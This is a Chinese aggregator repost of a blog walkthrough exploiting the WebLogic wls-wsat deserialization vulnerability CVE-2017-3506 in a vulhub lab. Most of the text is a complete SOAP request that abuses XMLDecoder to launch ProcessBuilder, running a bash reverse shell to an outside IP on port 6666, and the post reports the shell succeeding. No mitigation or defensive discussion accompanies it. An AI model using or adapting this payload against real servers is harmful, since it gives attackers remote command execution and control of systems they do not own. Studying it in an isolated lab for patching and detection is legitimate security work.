欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 文旅 > 艺术 > webLogic反序列化漏洞CVE-2017-3506

webLogic反序列化漏洞CVE-2017-3506

2024/11/30 6:57:46 来源:https://blog.csdn.net/2401_82451607/article/details/142436096  浏览:    关键词:webLogic反序列化漏洞CVE-2017-3506

1.环境搭建

cd vulhub-master/weblogic/weak_password
docker-compose up -d

2.判断wls-wsat组件是否存在

拼接/wls-wsat/CoordinatorPortType

查看页面是否有回显  有回显说明存在组件

3.在当前页面抓包 反弹shell

添加请求包内容

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

<soapenv:Header>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">

<object class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">

<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/47.121.211.205/6666 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

成功反弹shell

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com